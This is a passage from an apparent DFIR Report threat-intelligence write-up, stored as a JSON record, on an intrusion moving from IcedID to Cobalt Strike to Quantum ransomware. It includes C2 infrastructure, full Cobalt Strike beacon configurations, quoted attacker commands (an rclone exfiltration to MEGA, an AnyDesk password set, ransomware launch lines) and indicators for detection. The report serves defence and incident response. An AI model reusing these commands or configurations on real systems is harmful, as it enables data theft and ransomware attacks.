details.\r\nAfter the first call over an unencrypted port, command and control traffic moved over to TLS on port 443. 
Connections were\r\nmade to various IPs over the length of the intrusion, but two made up the majority of the traffic.\r\ndestination.ip destination.port tls.client.ja3 tls.server.ja3s zeek.ssl.server.nam\r\n5.196.103.145 443 a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc choifejuce[.]lol\r\n5.196.103.145 443 a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc erinindiaka[.]ques\r\n46.101.19.119 443 a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc opiransiuera[.]com\r\n178.128.85.30 443 a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc zoomersoidfor[.]c\r\n5.252.177.10 443 a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc considerf[.]info\r\n66.63.188.70 443 a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc antiflamez[.]bar\r\n155.138.159.45 443 a0e9f5d64349fb13191bc781f81f42e1 ec74a5c51106f0419184d0dd08fb05bc www[.]onlineclou\r\nIcedID C2 beaconing over the intrusion:\r\nCobalt Strike\r\nThere were a number of beacons deployed across the environment; over 70 named pipes were created. The beacons used\r\nrecognizable default Cobalt Strike configurations and attempted to masquerade dropped files as legitimate Microsoft\r\nWindows executables. For example, on one host, we could observe over 20 pipes being created, following the pattern postex_xxxx\r\nor MSSE-xxxx-server.\r\nWhen beacons were deployed within the environment, there was a significant increase in outbound network connections to\r\nC2 servers. 
For example, a beacon injected into a single Rundll32.exe process generated over 10K connections in a three-hour\r\nwindow, consistently across two days.\r\nThe threat actors deployed various beacons over the course of the intrusion using different methods, including executables,\r\nDLLs, and PowerShell beacons.\r\nOver the length of the intrusion, four different Cobalt Strike servers were observed in use. Some lasted the majority of the\r\nintrusion while others only lasted a few days.\r\nCobalt Strike SSL characteristics:\r\ndestination.ip destination.port tls.client.ja3 tls.server.ja3s zeek.ssl.server.na\r\n172.93.181.165 443 a0e9f5d64349fb13191bc781f81f42e1 ae4edc6faf64d08308082ad26be60767 fazehotafa[.]com\r\n45.66.151.109 443 a0e9f5d64349fb13191bc781f81f42e1 ae4edc6faf64d08308082ad26be60767 guteyutur[.]com\r\n111.90.143.191 443 72a589da586844d7f0818ce684948eea ae4edc6faf64d08308082ad26be60767 –\r\n78.128.112.139 443 72a589da586844d7f0818ce684948eea f176ba63b4d68e576b5ba345bec2c7b7 –\r\nAnalysis of the Nigu.exe binary indicated use of compression and PE loading characteristics, typically observed in Cobalt\r\nStrike beacon payloads. Using CAPA, the results listed the following capabilities:\r\nEmbedded within the binary were strings such as \"inflate 1.2.11 Copyright 1995-2017 Mark Adler\". 
Once the file was\r\nunpacked and the Cobalt Strike beacon binary carved, the Cobalt Strike configuration could be determined as follows:\r\n{\r\n \"beacontype\": [\r\n \"HTTPS\"\r\n ],\r\n \"sleeptime\": 5000,\r\n \"jitter\": 28,\r\n \"maxgetsize\": 1865903,\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"license_id\": 0,\r\n \"cfg_caution\": false,\r\n \"kill_date\": null,\r\n \"server\": {\r\n \"hostname\": \"fazehotafa.com\",\r\n \"port\": 443,\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC1nAS8+PqMnQs3hynG2JDgMQK6ZqLkIoDXWnqaOS/dQsdKBHE0Ify/\r\n },\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 27 of 46\n\n\"host_header\": \"\",\r\n \"useragent_header\": null,\r\n \"http-get\": {\r\n \"uri\": \"/ak.css\",\r\n \"verb\": \"GET\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"metadata\": null\r\n },\r\n \"server\": {\r\n \"output\": [\r\n \"print\",\r\n \"prepend 1767 characters\",\r\n \"base64\",\r\n \"base64url\"\r\n ]\r\n }\r\n },\r\n \"http-post\": {\r\n \"uri\": \"/profile\",\r\n \"verb\": \"POST\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"id\": null,\r\n \"output\": null\r\n }\r\n },\r\n \"tcp_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"crypto_scheme\": 0,\r\n \"proxy\": {\r\n \"type\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"behavior\": \"Use IE settings\"\r\n },\r\n \"http_post_chunk\": 0,\r\n \"uses_cookies\": true,\r\n \"post-ex\": {\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\"\r\n },\r\n \"process-inject\": {\r\n \"allocator\": \"VirtualAllocEx\",\r\n \"execute\": [\r\n \"CreateThread\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"min_alloc\": 9369,\r\n \"startrwx\": false,\r\n \"stub\": \"Ms1B7fCBDFtfSY7fRzHMbQ==\",\r\n \"transform-x86\": [\r\n \"prepend 
'\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90'\"\r\n ],\r\n \"transform-x64\": [\r\n \"prepend '\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90'\"\r\n ],\r\n \"userwx\": false\r\n },\r\n \"dns-beacon\": {\r\n \"dns_idle\": null,\r\n \"dns_sleep\": null,\r\n \"maxdns\": null,\r\n \"beacon\": null,\r\n \"get_A\": null,\r\n \"get_AAAA\": null,\r\n \"get_TXT\": null,\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 28 of 46\n\n\"put_metadata\": null,\r\n \"put_output\": null\r\n },\r\n \"pipename\": null,\r\n \"smb_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"stage\": {\r\n \"cleanup\": true\r\n },\r\n \"ssh\": {\r\n \"hostname\": null,\r\n \"port\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"privatekey\": null\r\n }\r\n}\r\nConfigurations for other Cobalt Strike servers observed:\r\n{\r\n \"beacontype\": [\r\n \"HTTPS\"\r\n ],\r\n \"sleeptime\": 60000,\r\n \"jitter\": 0,\r\n \"maxgetsize\": 1048576,\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"license_id\": 0,\r\n \"cfg_caution\": false,\r\n \"kill_date\": null,\r\n \"server\": {\r\n \"hostname\": \"111.90.143.191\",\r\n \"port\": 443,\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCnOM3nXx+7HBhkbDd+AwFrFisSunK999w2tM0uTpuuEiBalcJh\r\n },\r\n \"host_header\": \"\",\r\n \"useragent_header\": null,\r\n \"http-get\": {\r\n \"uri\": \"/j.ad\",\r\n \"verb\": \"GET\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"metadata\": null\r\n },\r\n \"server\": {\r\n \"output\": [\r\n \"print\"\r\n ]\r\n }\r\n },\r\n \"http-post\": {\r\n \"uri\": \"/submit.php\",\r\n \"verb\": \"POST\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"id\": null,\r\n \"output\": null\r\n }\r\n },\r\n \"tcp_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"crypto_scheme\": 0,\r\n \"proxy\": {\r\n \"type\": null,\r\n 
\"username\": null,\r\n \"password\": null,\r\n \"behavior\": \"Use IE settings\"\r\n },\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 29 of 46\n\n\"http_post_chunk\": 0,\r\n \"uses_cookies\": true,\r\n \"post-ex\": {\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\"\r\n },\r\n \"process-inject\": {\r\n \"allocator\": \"VirtualAllocEx\",\r\n \"execute\": [\r\n \"CreateThread\",\r\n \"SetThreadContext\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"min_alloc\": 0,\r\n \"startrwx\": true,\r\n \"stub\": \"Ms1B7fCBDFtfSY7fRzHMbQ==\",\r\n \"transform-x86\": null,\r\n \"transform-x64\": null,\r\n \"userwx\": true\r\n },\r\n \"dns-beacon\": {\r\n \"dns_idle\": null,\r\n \"dns_sleep\": null,\r\n \"maxdns\": null,\r\n \"beacon\": null,\r\n \"get_A\": null,\r\n \"get_AAAA\": null,\r\n \"get_TXT\": null,\r\n \"put_metadata\": null,\r\n \"put_output\": null\r\n },\r\n \"pipename\": null,\r\n \"smb_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"stage\": {\r\n \"cleanup\": false\r\n },\r\n \"ssh\": {\r\n \"hostname\": null,\r\n \"port\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"privatekey\": null\r\n }\r\n}\r\n{\r\n \"beacontype\": [\r\n \"HTTPS\"\r\n ],\r\n \"sleeptime\": 60000,\r\n \"jitter\": 0,\r\n \"maxgetsize\": 1048576,\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"license_id\": 305419776,\r\n \"cfg_caution\": false,\r\n \"kill_date\": null,\r\n \"server\": {\r\n \"hostname\": \"78.128.112.139\",\r\n \"port\": 443,\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCnOM3nXx+7HBhkbDd+AwFrFisSunK999w2tM0uTpuuEiBalcJh\r\n },\r\n \"host_header\": \"\",\r\n \"useragent_header\": null,\r\n \"http-get\": {\r\n \"uri\": \"/ga.js\",\r\n \"verb\": 
\"GET\",\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 30 of 46\n\n\"client\": {\r\n \"headers\": null,\r\n \"metadata\": null\r\n },\r\n \"server\": {\r\n \"output\": [\r\n \"print\"\r\n ]\r\n }\r\n },\r\n \"http-post\": {\r\n \"uri\": \"/submit.php\",\r\n \"verb\": \"POST\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"id\": null,\r\n \"output\": null\r\n }\r\n },\r\n \"tcp_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"crypto_scheme\": 0,\r\n \"proxy\": {\r\n \"type\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"behavior\": \"Use IE settings\"\r\n },\r\n \"http_post_chunk\": 0,\r\n \"uses_cookies\": true,\r\n \"post-ex\": {\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\"\r\n },\r\n \"process-inject\": {\r\n \"allocator\": \"VirtualAllocEx\",\r\n \"execute\": [\r\n \"CreateThread\",\r\n \"SetThreadContext\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"min_alloc\": 0,\r\n \"startrwx\": true,\r\n \"stub\": \"tUr+Aexqde3zXhpE+L05KQ==\",\r\n \"transform-x86\": null,\r\n \"transform-x64\": null,\r\n \"userwx\": true\r\n },\r\n \"dns-beacon\": {\r\n \"dns_idle\": null,\r\n \"dns_sleep\": null,\r\n \"maxdns\": null,\r\n \"beacon\": null,\r\n \"get_A\": null,\r\n \"get_AAAA\": null,\r\n \"get_TXT\": null,\r\n \"put_metadata\": null,\r\n \"put_output\": null\r\n },\r\n \"pipename\": null,\r\n \"smb_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"stage\": {\r\n \"cleanup\": false\r\n },\r\n \"ssh\": {\r\n \"hostname\": null,\r\n \"port\": null,\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 31 of 46\n\n\"username\": null,\r\n \"password\": null,\r\n \"privatekey\": null\r\n }\r\n}\r\nRemote Access Software\r\nAs shown above, 
three different remote access software packages were used by the threat actor:\r\nAtera\r\nSplashtop\r\nAnyDesk\r\nIt is unclear why the threat actor used three different tools in order to establish an interactive and persistent command and\r\ncontrol channel.\r\nThe AnyDesk service password was set manually using the command line as shown below:\r\npowershell -np -w hidden -encodedcommand JABzAD0ATgBlAHcAL [.....] --\u003e CS beacon\r\n --\u003e \"c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe\" -Version 5.1 -s -NoLogo -NoProfile\r\n --\u003e C:\\Windows\\system32\\cmd.exe /C cmd.exe /c echo Qwerty123!@#_! | C:\\ProgramData\\anydesk.exe --set-pass\r\nThe software packages were bundled within a single Microsoft Software Installer (MSI) package named hp.msi. This was\r\ninstalled from the ProgramData folder, resulting in the installation of the remote management tools. The activity can be\r\ncorrelated against the Application log for MSI installer events (Event ID 1033).\r\nExfiltration\r\nDuring the intrusion, the threat actors were observed accessing collected data such as ShareFinder.txt using Notepad and\r\nthen copying the contents to the clipboard.\r\nWhilst the process activity indicated Active Directory accounts being used, correlating this activity with clipboard activity\r\nrevealed matching sessions, process IDs, and the true source of the user activity.\r\nIn this case, ShareFinder.txt was created in the ProgramData folder by the ShareFinder.ps1 script. Approximately 2 seconds\r\nlater, the threat actors accessed this file and copied the contents.\r\nWhile the threat actors made attempts to proxy RDP traffic and minimize external RDP access, the threat actors’ workstation\r\nwas revealed in several Windows logs. 
Sysmon Event ID 24 linked the threat actors’ host name HYPERV and the IPv4\r\naddress 199.101.184[.]230. This host name was also present in the Security events:\r\nFor example, Event ID 4779, relating to a user disconnecting from a terminal session, reveals the client name of the source\r\nworkstation. The client address was the internal workstation through which the RDP traffic was being proxied.\r\nExfiltrated Documents Opened Remotely\r\nDuring the second day of the intrusion, documents from the organization were opened remotely from 212.102.59[.]162 and\r\n165.231.182[.]14. This occurred before Rclone was used, which leads us to believe the documents were exfiltrated over one\r\nof the encrypted C2 channels.\r\nRclone\r\nOn the backup server, rclone.exe was used in order to exfiltrate data to MEGA cloud storage.\r\nrclone.exe copy --max-age 5y \"\\\\[REDACTED BACKUP]\\E:\\[REDACTED]\\\" remote:Groups --exclude \"*.{psd,7z,dwg,rar\r\nFrom the rclone.exe configuration file, we can retrieve the user’s email address and password.\r\nMega user account:\r\ngoodvibe888@proton.me\r\nImpact\r\nAlert\r\nInterestingly, the operator issued a command that displayed an alert informing the end user of a compromise, specifically\r\nwith Cobalt Strike. It's unclear why the operator chose to do this, as this was around three hours prior to the ransomware\r\nbeing executed or a ransom note being dropped.\r\nThe alert message that was visible:\r\nThe activity can be observed in the PowerShell WinEvent logs:\r\nRansomware\r\nThe threat actors dropped the first of their ransomware binaries on the fourth day of the intrusion. Around 40 minutes after\r\ncreating the alert messages via Cobalt Strike, they dropped locker_64.exe on the backup server. 
They created a\r\nfile (2.txt) and populated it with a list of hosts they had uncovered during their discovery activity. The locker_64.exe file was\r\nthen renamed to 64.exe and executed using the text file in the command arguments:\r\n64.exe /target=@2.txt\r\nThe threat actors attempted to execute the malware across all hosts in the target list, but only execution on the backup server\r\nwas observed.\r\nThe threat actor then tried again on a different server, using a DLL this time:\r\nrundll32 locker_32.dll,run /target=@2.txt\r\nAgain, only execution on the server was observed. They then executed a new Cobalt Strike PowerShell beacon on a third\r\nserver and executed the ransomware using that.\r\n\"c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe\" -Version 5.1 -s -NoLogo -NoProfile\r\n ➝ C:\\Windows\\system32\\cmd.exe /C locker_64.exe\r\nThey then opened an RDP connection back to the primary domain controller and proceeded to try to execute the binary with\r\na target list again. 
After only affecting the single host, the threat actors dropped several batch scripts on the server:\r\npass.bat\r\n1.bat\r\n2.bat\r\nThe script pass.bat proceeded to reset all the user accounts in the domain to a single password set by the threat actors.\r\nThousands of Windows Security Event ID 4724 events were generated within a two-minute period.\r\nThis password reset would enable the next scripts to function as intended while also hampering any recovery activity.\r\nThe 1.bat file then proceeded to copy the ransomware binary across to hosts in the environment.\r\nFinally, 2.bat used the reset password to enable PsExec to execute the ransomware on all the remote hosts.\r\nWhen the payload was executed, there were some telltale registry events observed indicating .Quantum file extension Shell\r\nOpen Command artifacts.\r\nThe HTML message was dropped in various directories across the endpoints:\r\nThe HTML file displayed the all-too-familiar message:\r\nThe following Locker files were then deleted:\r\nDiamond Model\r\nTimeline\r\nIndicators\r\nAtomic\r\nIcedID:\r\nalockajilly.com\r\nzoomersoidfor.com\r\nchoifejuce.lol\r\nopiransiuera.com\r\nerinindiaka.quest\r\nopiransiuera.com\r\nzoomersoidfor.com\r\nconsiderf.info\r\nantiflamez.bar\r\nwww.onlinecloud.cloud\r\n64.227.12.180:80\r\n5.196.103.145:443\r\n66.63.188.70:443\r\n178.128.85.30:443\r\n5.252.177.10:443\r\n46.101.19.119:443\r\nCobalt 
Strike:\r\nfazehotafa.com\r\nguteyutu.com\r\n45.66.151.109\r\n172.93.181.165\r\n111.90.143.191\r\n78.128.112.139\r\nMega User:\r\ngoodvibe888@proton[.]me\r\nAttacker Infrastructure:\r\n199.127.60[.]117\r\n199.101.184[.]230\r\nComputed\r\nInvoice-09-28#268_PDF.iso\r\n515047b6ce410001696812bc85e197d1\r\n26b11c95a6a324dbb0ab32428361b0531234ecee\r\n68f971a1b391f809058e83058a2037d29c28a8a21fd618b0d952466c632ff1be\r\ndocuments.lnk\r\n1af7a0e058ce1b63b138a1425a835561\r\n66b8da857c6dc45dea3a9fb17a503b3c2d203245\r\n1ee563caf943d3a7ed315dda9c37f0c9c445eec6dfb78ae196d2989626a0dfec\r\neyewear.bat\r\n0d51c60c67c62836ba0f7948113b3737\r\na597205ed55b6e6413a17edb62cbb29bda735676\r\n999cba918c297bf0b0d7d4aa9003e6338cc300a9270cc758d1d108c26603417d\r\neasygoing.dat\r\nf102a95e749d1ee63c71df902856ae51\r\nfda81b5951bb02ef0236088c310d9bc4fa70e1e6\r\nf27d924911a7087928012764358bad9240b2ba8aeeca5e0d717abdbb82344981\r\nrapuab1.dll\r\nce1b0e77a31da8dc68f77a977b04f3e4\r\n5facd0aa9a29e0768ab9f432c79eac173af69711\r\n163800b0fbf1b1b7bbc7f719df421ed717111c7c9ddea9c9b41f898ee22dd51a\r\nhttps://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\r\nPage 42 of 
46\n\n9bd6b1f24b9589a3fbc1d54b6e6184b8\r\nf8473c6c8b298a3d72c8ca890667eddab62d2ba8\r\n03a9d6afc99e70333723d921bd1265ac948cdabb8b15689b5ceb1c02365a9572\r\nbeacA.dll\r\n1b1497c2758ff5a8ade2df336a7a6c2d\r\nd6cc874f84797813c225318b877eace04ca5f5a1\r\n47ed0d1c7d8abc159d1eb2bb9fbe037f38b0846217cc11132652734f93ad5678\r\nbeaconM-1664297797-T0B9Z_32-cr.exe\r\ndbb08886c60f3c44b377d09bd9d8b6d3\r\n7262b7df4d90409fb141856d9b55792872deda20\r\n8f7cc7cc14a12753d41678981b929546d12218d457a9d22951808cb5f19e549c\r\ndf5ce1159ef2e257df92e1825d786d87\r\na7e163eaa0fc2afb9c0d5ac6f79cb3e49919dd3c\r\n842737b5c36f624c9420a005239b04876990a2c4011db87fe67504fa09281031\r\nAD.bat\r\ne77f23aac8db0d23196b6bef64fe04fc\r\n90bf77e194970dd74d1b49faf58ae395ce49bb34\r\nc2ebcc389304539bc13c3d2023cf88f9ea0bac7210fefa03f8333eaab0bbb76d\r\nns.bat\r\n7ac356035fce31e9e14c3a3d371ddf41\r\n61f838d9b0998ab23877e86f6e8ba3551799e07c\r\n4f52c7448bdcb4caa2eff701b0f3b60b406aea278ecd5a3b23cac808a65418e7\r\n92edbbeff775928cfc6e3c8efefe4ecc\r\nfffa0ce086791c41360971e3ce6a0d1af1701616\r\nfc4da07183de876a2b8ed1b35ec1e2657400da9d99a313452162399c519dbfc6\r\n955d0cf317efe48bf0394330fcd82ebb\r\nd84d40038311e188e25c78389b51b900de9c69bd\r\ne9da08831e0d4395f697e4f18c87be941bf52c79d84da1cc88186bdea1ebf4f4\r\nlsass.dll\r\nadc50d0c1e7bf37288a612a0f278e028\r\n6254e8cca47d87f29e85627a08ba88b79915a459\r\nfafc84466c1ce361bb6ce219bde2b64ca07a6a6feda23f444749ba06c44b0580\r\n397020072f5787dbbc0c344f98623bbd\r\n970e793c86266b20d280c04e0f41ec7ae9c2093c\r\n6511d6e84343c2d3a4cd36853170509e2751e27c86f67c6a031dc88e7e495e48\r\n601d613bff412d245e3edf46dc499d83\r\na39b9119003c63583e2a0f11f19f3e6050399176\r\n2a2c83a7c8cd33e45dc14b8d955e00161580d6d2736f4e75a235aa3eb2f21528\r\nlocker_32.dll\r\n131d277cfbc9f4b2d667150d84ad503d\r\nf05ff93ee4d2f31bc70c0484a559d562203b7700\r\na378b8e9173f4a5469e7b5105be40723af29cbd6ee00d3b13ff437dae4514dff\r\nlicense.dat\r\nb31de50a57e8cb73c9efda8b97ffa261\r\na7e3f617644599ec695da84d140a7b69c392a421\r\n55be890947d021fcc8c29a
f3c7aaf70d8132f222e944719c43a6e819e84a8f8b\r\nDetections\r\nNetwork\r\nET HUNTING Suspicious Empty SSL Certificate - Observed in Cobalt Strike\r\nET Threatview.io High Confidence Cobalt Strike C2 IP group 2\r\nET INFO Pastebin-style Service (textbin .net in TLS SNI)\r\nET INFO Splashtop Domain (splashtop .com) in TLS SNI\r\nET INFO Splashtop Domain in DNS Lookup (splashtop .com)\r\nET MALWARE Meterpreter or Other Reverse Shell SSL Cert\r\nET POLICY PE EXE or DLL Windows file download HTTP\r\nET INFO Dotted Quad Host DLL Request\r\nET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download\r\nET HUNTING SUSPICIOUS Dotted Quad Host MZ Response\r\nET HUNTING Suspicious lsass.exe in URI\r\nET MALWARE Win32/IcedID Request Cookie\r\nET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software)\r\nET USER_AGENTS AnyDesk Remote Desktop Software User-Agent\r\nET EXPLOIT Possible Zerologon Phase 1/3 - NetrServerReqChallenge with 0x00 Client Challenge (CVE-2020-1472)\r\nET EXPLOIT Zerologon Phase 2/3 - NetrServerAuthenticate2 Request with 0x00 Client Challenge and Sign and Seal\r\nET EXPLOIT Zerologon Phase 3/3 - Malicious NetrServerPasswordSet2 (CVE-2020-1472)\r\nSigma\r\nYara\r\nwin_cobalt_strike_auto\r\nCobaltStrike__Resources_Artifact32_and_Resources_Dropper_v1_45_to_v4_x.yara\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/18041/18041.yar\r\nMITRE\r\nSpearphishing Attachment - T1566.001\r\nWindows Management Instrumentation - T1047\r\nWindows Command Shell - T1059.003\r\nMalicious File - T1204.002\r\nPowerShell - T1086\r\nService Execution - T1035\r\nScheduled Task - T1053.005\r\nExploitation for 
Privilege Escalation - T1068\r\nAccess Token Manipulation - T1134\r\nRegsvr32 - T1218.010\r\nRundll32 - T1218.011\r\nDCSync - T1003.006\r\nLSASS Memory - T1003.001\r\nDomain Trust Discovery - T1482\r\nSystem Information Discovery - T1082\r\nRemote System Discovery - T1018\r\nGroup Policy Discovery - T1615\r\nSystem Language Discovery - T1614.001\r\nSystem Time Discovery - T1124\r\nNetwork Share Discovery - T1135\r\nDomain Account - T1087.002\r\nFile and Directory Discovery - T1083\r\nRemote Desktop Protocol - T1021.001\r\nSMB/Windows Admin Shares - T1021.002\r\nLateral Tool Transfer - T1570\r\nWindows Remote Management - T1021.006\r\nLocal Data Staging - T1074.001\r\nWeb Protocols - T1071.001\r\nExfiltration to Cloud Storage - T1567.002\r\nData Encrypted for Impact - T1486\r\nAccount Access Removal - T1531\r\nDisable or Modify Tools - T1562.001\r\nMark-of-the-Web Bypass - T1553.005\r\nSystem Owner/User Discovery - T1033\r\nS0002 - Mimikatz\r\nS0154 - Cobalt Strike\r\nS0359 - Nltest\r\nS0039 - Net\r\nS0096 - Systeminfo\r\nS0100 - IPconfig\r\nS0552 - AdFind\r\nInternal case #18041\r\nSource: https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/"
	],
	"report_names": [
		"malicious-iso-file-leads-to-domain-wide-ransomware"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434640,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/eb3444ea8d32605e1e3085e287554ec9bb571a0c.pdf",
		"text": "https://archive.orkl.eu/eb3444ea8d32605e1e3085e287554ec9bb571a0c.txt",
		"img": "https://archive.orkl.eu/eb3444ea8d32605e1e3085e287554ec9bb571a0c.jpg"
	}
}